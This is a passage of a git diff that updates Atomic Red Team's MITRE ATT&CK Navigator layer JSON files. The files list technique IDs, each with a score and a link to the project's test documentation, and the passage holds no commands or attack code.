chniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/a
tomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atom
ics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team
/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/at
omic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one 
test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.
md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","sc
ore":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.006
","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1070.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techni
queID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":
"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"en
abled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanar
yco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://gi
thub.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment
":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 4fd93aa6..e7753f83 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanary